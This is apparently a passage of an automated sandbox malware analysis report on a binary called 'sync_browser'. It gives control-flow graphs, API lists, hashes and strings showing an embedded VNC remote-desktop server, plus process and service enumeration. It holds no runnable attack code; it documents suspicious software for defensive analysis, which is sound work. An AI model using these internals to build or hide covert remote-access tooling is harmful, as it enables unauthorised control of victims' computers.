7ff7e5097c81-7ff7e5097c8f Sleep 208->212 213 7ff7e5097c95-7ff7e5097ca4 208->213 210 7ff7e5094349-7ff7e5094361 209->210 211 7ff7e509438b-7ff7e5097c14 209->211 210->211 235 7ff7e5097c23-7ff7e5097c25 211->235 236 7ff7e5097c16-7ff7e5097c1e call 7ff7e509c4e0 211->236 212->213 218 7ff7e5097ca6-7ff7e5097ce4 FlushFileBuffers 213->218 219 7ff7e5097cf7-7ff7e5097d06 213->219 215->208 234 7ff7e5094319-7ff7e509431c 215->234 216->208 218->219 222 7ff7e5097ce6-7ff7e5097cec CloseHandle 218->222 225 7ff7e5097d08-7ff7e5097d46 FlushFileBuffers 219->225 226 7ff7e5097d59-7ff7e5097d71 call 7ff7e50da3b0 219->226 222->219 229 7ff7e50940bf-7ff7e50940c2 CloseDesktop 223->229 230 7ff7e50940c8-7ff7e50940cc 223->230 224->216 233 7ff7e5097c54-7ff7e5097c64 224->233 225->226 231 7ff7e5097d48-7ff7e5097d4e CloseHandle 225->231 240 7ff7e5097d73-7ff7e5097d8d call 7ff7e50a2170 226->240 241 7ff7e5097d94-7ff7e5097d9b 226->241 229->230 230->141 231->226 233->202 234->209 235->208 239 7ff7e5097c27-7ff7e5097c42 235->239 236->235 239->139 240->241 243 7ff7e5097dbc-7ff7e5097e13 call 7ff7e5073730 GetModuleFileNameA 241->243 244 7ff7e5097d9d-7ff7e5097da5 CloseDesktop 241->244 252 7ff7e5097e15-7ff7e5097e53 call 7ff7e512a220 243->252 253 7ff7e5097e56-7ff7e5097e69 LoadLibraryA 243->253 244->243 245 7ff7e5097da7-7ff7e5097db7 call 7ff7e5073730 244->245 245->243 252->253 255 7ff7e5097e6b-7ff7e5097e97 GetProcAddress FreeLibrary 253->255 256 7ff7e5097e9d-7ff7e5097ec0 253->256 255->256 260 7ff7e5097ec2-7ff7e5097ed8 call 7ff7e508e580 call 7ff7e5107c90 256->260 261 7ff7e5097edd-7ff7e5097ef0 256->261 260->261 261->26
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Desktop$Thread$CloseCriticalSection$CurrentEnterFilefree$BuffersErrorFlushHandleInputLeaveLibraryNameObjectOpenSleep$AddressComputerCountCreateDeleteFreeInformationLastLoadModeModulePriorityProcRectTickTimeUser_snprintfgethostnametime
                                                                      • String ID: ( $ - $Could not connect to %s!$Could not connect using %s!$Host name unavailable$LOGEXIT$WinVNC$\logging.dll$application mode$service mode$vncclient.cpp : PostAddNewClient I$vncclient.cpp : PostAddNewClient II$vncclient.cpp : authenticated connection$vncclient.cpp : client connected : %s (%hd)$vncclient.cpp : client disconnected : %s (%hd)$vncclient.cpp : failed to close desktop$vncclient.cpp : negotiated version$vncclient.cpp : sent pixel format to client$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : PostAddNewClient failed$vncservice.cpp : SelectDesktop $vncservice.cpp : SelectDesktop failed to close desktop
                                                                      • API String ID: 459429253-3399855497
                                                                      • Opcode ID: d910fd2d2387e2035f705f97629f63b5daf9f0bcc88dd8988d1e93384b6c5770
                                                                      • Instruction ID: d5e7944a8354691b301445e8c2ecfdb683845367cad1f6c0c80ec2d012ae07ff
                                                                      • Opcode Fuzzy Hash: d910fd2d2387e2035f705f97629f63b5daf9f0bcc88dd8988d1e93384b6c5770
                                                                      • Instruction Fuzzy Hash: 9FA2C026608A8585E750EB39D8687FEB7A1FB84F94F844233DA1D877A8DF38D444C721
                                                                      Function 00007FF7E50D9BC0 Relevance: 31.6, APIs: 14, Strings: 4, Instructions: 105libraryloaderprocessCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressLibraryProcProcess$CloseCreateCurrentFirstFreeHandleLoadMetricsProcess32SessionSnapshotSystemToolhelp32
                                                                      • String ID: ProcessIdToSessionId$WTSGetActiveConsoleSessionId$explorer.exe$kernel32.dll
                                                                      • API String ID: 1881659197-3751679782
                                                                      • Opcode ID: 2dbd4ffebc6746016a1012bd7f42155df4cc965da3ae6bbb03cb4ee60b751db4
                                                                      • Instruction ID: a9fe2c797e19dcd8b58d2ebea04e867cb1eb2ce39da0b8c93f28112560f5dc60
                                                                      • Opcode Fuzzy Hash: 2dbd4ffebc6746016a1012bd7f42155df4cc965da3ae6bbb03cb4ee60b751db4
                                                                      • Instruction Fuzzy Hash: 0E413331A08B4E86EA60AB21B824375F390FF48F91F841536E95E87798EF3CE405C721
                                                                      Function 00007FF7E50D9EF0 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 113COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Unknown OS , xrefs: 00007FF7E50DA094
                                                                      • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - ERROR : No window station , xrefs: 00007FF7E50D9F3B
                                                                      • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Usersize 0, xrefs: 00007FF7E50D9F7F
                                                                      • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: No user logged on , xrefs: 00007FF7E50DA01F
                                                                      • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: NOT impersonating user , xrefs: 00007FF7E50D9FB7
                                                                      • vncservice.cpp : getusername error %d, xrefs: 00007FF7E50DA04A
                                                                      • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - UserNAme found: %s , xrefs: 00007FF7E50DA06F
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$User$InformationNameObjectProcessRevertSelfStationWindow
                                                                      • String ID: vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - ERROR : No window station $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: NOT impersonating user $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: No user logged on $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Unknown OS $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Usersize 0$vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - UserNAme found: %s $vncservice.cpp : getusername error %d
                                                                      • API String ID: 3635673080-2232443292
                                                                      • Opcode ID: df8b4108ed97db498e513780486a315d6e916c093cc0dcc6e4f94b4d88527eb8
                                                                      • Instruction ID: ba7efcf136e516ec05dc8aca83462afc4a8f7bd6b31430ed7eea2138260ba59d
                                                                      • Opcode Fuzzy Hash: df8b4108ed97db498e513780486a315d6e916c093cc0dcc6e4f94b4d88527eb8
                                                                      • Instruction Fuzzy Hash: A2417F25E0C64B86FB10BB24F8603B9E3A1AF84B48FC40437E60DC6569EE7DE455C722
                                                                      Function 00007FF7E50DD890 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 158COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 538 7ff7e50dd890-7ff7e50dd8c0 539 7ff7e50dd8c6-7ff7e50dd8c9 538->539 540 7ff7e50ddadf 538->540 542 7ff7e50dd8d3-7ff7e50dd8d7 539->542 543 7ff7e50dd8cb-7ff7e50dd8ce 539->543 541 7ff7e50ddae1-7ff7e50ddafa 540->541 544 7ff7e50dda85-7ff7e50dda8c 542->544 545 7ff7e50dd8dd-7ff7e50dd8e5 542->545 543->541 547 7ff7e50ddab0-7ff7e50ddabb WSAGetLastError 544->547 548 7ff7e50dda8e-7ff7e50ddaa2 recv 544->548 545->544 546 7ff7e50dd8eb-7ff7e50dd905 545->546 549 7ff7e50dd911-7ff7e50dd91e 546->549 550 7ff7e50dd907-7ff7e50dd910 EnterCriticalSection 546->550 547->540 553 7ff7e50ddabd-7ff7e50ddabf 547->553 551 7ff7e50ddaa4-7ff7e50ddaac 548->551 552 7ff7e50ddaae 548->552 554 7ff7e50dd936-7ff7e50dd949 549->554 555 7ff7e50dd920-7ff7e50dd934 549->555 550->549 551->553 552->547 556 7ff7e50ddac7-7ff7e50ddada call 7ff7e5073730 552->556 553->543 557 7ff7e50ddac5 553->557 561 7ff7e50dd950-7ff7e50dd956 554->561 555->561 556->540 557->544 562 7ff7e50dd986-7ff7e50dd98a 561->562 563 7ff7e50dd958-7ff7e50dd96e call 7ff7e5073730 561->563 564 7ff7e50dd98d-7ff7e50dd98f 562->564 573 7ff7e50dd96f-7ff7e50dd972 563->573 566 7ff7e50dd995-7ff7e50dd99c 564->566 567 7ff7e50dda1e-7ff7e50dda33 564->567 571 7ff7e50dd9c6-7ff7e50dd9d1 WSAGetLastError 566->571 572 7ff7e50dd99e-7ff7e50dd9b2 recv 566->572 569 7ff7e50dda35-7ff7e50dda4d 567->569 570 7ff7e50dda4f-7ff7e50dda67 567->570 583 7ff7e50dda6e-7ff7e50dda71 569->583 570->583 577 7ff7e50dd9d3-7ff7e50dd9d7 571->577 578 7ff7e50dd9f7-7ff7e50dda19 WSAGetLastError call 7ff7e5073730 571->578 575 7ff7e50dd9c4 572->575 576 7ff7e50dd9b4-7ff7e50dd9c2 572->576 573->540 574 7ff7e50dd978-7ff7e50dd981 LeaveCriticalSection 573->574 574->540 575->571 581 7ff7e50dd9d9-7ff7e50dd9f2 call 7ff7e5073730 575->581 576->564 577->564 578->573 581->573 583->543 586 7ff7e50dda77-7ff7e50dda80 LeaveCriticalSection 583->586 586->543
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave
                                                                      • String ID: vsocket.cpp : WriteExact: DSMPlugin-RestoreBuffer Alloc Error$vsocket.cpp : socket error 1: %d$vsocket.cpp : zero bytes read1$vsocket.cpp : zero bytes read2
                                                                      • API String ID: 3168844106-4245644328
                                                                      • Opcode ID: fb51c5f38e3ceb32ba6187375171630d2d9d6b8a6abb1b1af77451ade3fe2d73
                                                                      • Instruction ID: a3774ef9e985693c1cd3b013301632d55d21c0b53fd8c99bf5394f1b9b00011a
                                                                      • Opcode Fuzzy Hash: fb51c5f38e3ceb32ba6187375171630d2d9d6b8a6abb1b1af77451ade3fe2d73
                                                                      • Instruction Fuzzy Hash: 6461662290CA8A87E770AB39A454379E3A0FB44F54F945132EA5EC76E4DF3CD405C712
                                                                      Function 00007FF7E5079D00 Relevance: 15.2, APIs: 10, Instructions: 209serviceCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 602 7ff7e5079d00-7ff7e5079d9b call 7ff7e50729a0 605 7ff7e5079d9d 602->605 606 7ff7e5079db3-7ff7e5079dc7 OpenSCManagerA 602->606 607 7ff7e5079da0-7ff7e5079db1 call 7ff7e5128894 605->607 608 7ff7e5079dc9-7ff7e5079dce 606->608 609 7ff7e5079de0-7ff7e5079e25 EnumServicesStatusA 606->609 607->606 611 7ff7e5079dd9-7ff7e5079ddb 608->611 612 7ff7e5079dd0-7ff7e5079dd4 call 7ff7e5127914 608->612 613 7ff7e5079fed-7ff7e5079ffc CloseServiceHandle 609->613 614 7ff7e5079e2b-7ff7e5079e36 GetLastError 609->614 619 7ff7e507a00b-7ff7e507a031 call 7ff7e5127220 611->619 612->611 615 7ff7e5079ffe-7ff7e507a002 call 7ff7e5127914 613->615 616 7ff7e507a007 613->616 614->613 620 7ff7e5079e3c-7ff7e5079e3f call 7ff7e51271fc 614->620 615->616 616->619 624 7ff7e5079e44-7ff7e5079e4e 620->624 624->613 626 7ff7e5079e54-7ff7e5079e8d EnumServicesStatusA 624->626 627 7ff7e5079fe5-7ff7e5079fe8 call 7ff7e51278d4 626->627 628 7ff7e5079e93-7ff7e5079e9a 626->628 627->613 628->627 629 7ff7e5079ea0 628->629 631 7ff7e5079ea3-7ff7e5079ea6 629->631 632 7ff7e5079eac-7ff7e5079ec5 OpenServiceA 631->632 633 7ff7e5079fe1 631->633 632->633 634 7ff7e5079ecb-7ff7e5079edf QueryServiceConfigA 632->634 633->627 635 7ff7e5079fc7-7ff7e5079fdb CloseServiceHandle 634->635 636 7ff7e5079ee5-7ff7e5079eee GetLastError 634->636 635->631 635->633 636->635 637 7ff7e5079ef4-7ff7e5079f02 call 7ff7e51271fc 636->637 637->635 640 7ff7e5079f08-7ff7e5079f1e QueryServiceConfigA 637->640 641 7ff7e5079f24-7ff7e5079f8d call 7ff7e50729a0 call 7ff7e5079c80 call 7ff7e507a120 640->641 642 7ff7e5079fbf-7ff7e5079fc2 call 7ff7e51278d4 640->642 650 7ff7e5079faf-7ff7e5079fb4 641->650 651 7ff7e5079f8f-7ff7e5079fa8 call 7ff7e51285e0 641->651 642->635 650->642 653 7ff7e5079fb6-7ff7e5079fba call 7ff7e5127914 650->653 651->650 653->642
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Service$CloseConfigEnumErrorHandleLastOpenQueryServicesStatus$Manager
                                                                      • String ID:
                                                                      • API String ID: 3151975580-0
                                                                      • Opcode ID: 2bd10b3906a7b2c812c4d056fde43adfe123f9b05cd6780d6db58cbf665bb52e
                                                                      • Instruction ID: 226ad1e2d412f391aa205887807fea5bfa422fbe5ea5fadbdb4fc5c313c38730
                                                                      • Opcode Fuzzy Hash: 2bd10b3906a7b2c812c4d056fde43adfe123f9b05cd6780d6db58cbf665bb52e
                                                                      • Instruction Fuzzy Hash: 5A918222B08A4589FB10EB71E4257BDB3B1AB44BA8F804636EE2D57BD8DF38D505C311
                                                                      Function 00007FF7E5098590 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 165windowsynchronizationCOMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 298 7ff7e5098590-7ff7e50985de call 7ff7e5073730 301 7ff7e50985e0-7ff7e50985e9 298->301 302 7ff7e509862f-7ff7e5098639 298->302 303 7ff7e5098612-7ff7e509861c 301->303 304 7ff7e50985eb-7ff7e509860e SendMessageA WaitForSingleObject 301->304 305 7ff7e5098645-7ff7e509864f 302->305 306 7ff7e509863b-7ff7e509863e 302->306 307 7ff7e5098628 303->307 308 7ff7e509861e-7ff7e5098626 call 7ff7e5084110 303->308 304->303 309 7ff7e5098651-7ff7e5098656 call 7ff7e5128bf4 305->309 310 7ff7e509865d-7ff7e5098664 305->310 306->305 307->302 308->307 309->310 311 7ff7e5098666-7ff7e5098688 call 7ff7e5073730 310->311 312 7ff7e509869b-7ff7e50986a5 310->312 324 7ff7e5098694 311->324 325 7ff7e509868a-7ff7e509868d 311->325 316 7ff7e50986b3-7ff7e50986bd 312->316 317 7ff7e50986a7-7ff7e50986ac call 7ff7e51278d4 312->317 320 7ff7e50986bf-7ff7e50986c4 call 7ff7e51278d4 316->320 321 7ff7e50986cb-7ff7e50986d5 316->321 317->316 320->321 322 7ff7e50986d7 call 7ff7e51278d4 321->322 323 7ff7e50986dc-7ff7e50986e6 321->323 322->323 329 7ff7e50986e8 call 7ff7e51278d4 323->329 330 7ff7e50986ed-7ff7e50986f7 323->330 324->312 325->324 329->330 333 7ff7e50986f9 call 7ff7e51278d4 330->333 334 7ff7e50986fe-7ff7e5098704 330->334 333->334 336 7ff7e5098706-7ff7e509870d 334->336 337 7ff7e5098757-7ff7e5098761 334->337 336->337 340 7ff7e509870f-7ff7e5098719 336->340 338 7ff7e5098763 call 7ff7e5128bf4 337->338 339 7ff7e5098768-7ff7e5098772 337->339 338->339 342 7ff7e5098774-7ff7e5098779 call 7ff7e5128bf4 339->342 343 7ff7e509877a-7ff7e5098782 339->343 344 7ff7e5098736-7ff7e509873e call 7ff7e50da220 340->344 345 7ff7e509871b-7ff7e5098723 340->345 342->343 348 7ff7e5098790-7ff7e50987b3 343->348 349 7ff7e5098784-7ff7e509878b call 7ff7e5127914 343->349 344->337 357 7ff7e5098740-7ff7e5098751 SendMessageA 344->357 345->337 358 7ff7e5098725-7ff7e5098734 345->358 350 7ff7e50987b5-7ff7e50987bb FreeLibrary 348->350 351 7ff7e50987bc-7ff7e50987dc call 7ff7e51278d4 * 2 348->351 349->348 350->351 363 7ff7e50987ea-7ff7e5098896 DeleteObject call 7ff7e5128bf4 DeleteObject call 7ff7e5128bf4 DeleteObject call 7ff7e5128bf4 DeleteObject call 7ff7e5128bf4 351->363 364 7ff7e50987de-7ff7e50987e5 call 7ff7e5127914 351->364 357->337 358->337 358->344 364->363
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: free$Object$Delete$MessageSend$FreeLibrarySingleWait
                                                                      • String ID: vncclient.cpp : deleting socket$vncclient.cpp : ~vncClient() executing...
                                                                      • API String ID: 2172171234-2418058073
                                                                      • Opcode ID: ae43704471dc359bc283cfe2eb67b83c9c223570d8a40ab8efa04644ebaf49f5
                                                                      • Instruction ID: e80106d99ef05142c99834a53e7dec9d395d57d02c66ef79e6c306bc67671356
                                                                      • Opcode Fuzzy Hash: ae43704471dc359bc283cfe2eb67b83c9c223570d8a40ab8efa04644ebaf49f5
                                                                      • Instruction Fuzzy Hash: AA813C35609A8985EB54EF75E4643B9A360FF84F84F844136EA0D8B799CF39D451C332
                                                                      Function 00007FF7E50C2FF0 Relevance: 27.2, APIs: 18, Instructions: 183windowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessageSend$DialogItemLongWindowmallocstd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 1935883720-0
                                                                      • Opcode ID: 7be5ccecca7b2e798f0e3ae60729954586f2e76e6c9a6f26eb5410dab4250f23
                                                                      • Instruction ID: 526bbf9ebc192ce1d568d8ca13802a3e40a08fdff56d65df26cd98552e119c4c
                                                                      • Opcode Fuzzy Hash: 7be5ccecca7b2e798f0e3ae60729954586f2e76e6c9a6f26eb5410dab4250f23
                                                                      • Instruction Fuzzy Hash: 1761EC31B08A4985EB20EB25E4647BAA351FB89FD0F945132DD5D87798DF3CD445C312
                                                                      Function 00007FF7E51075C0 Relevance: 25.7, APIs: 17, Instructions: 151threadmemoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
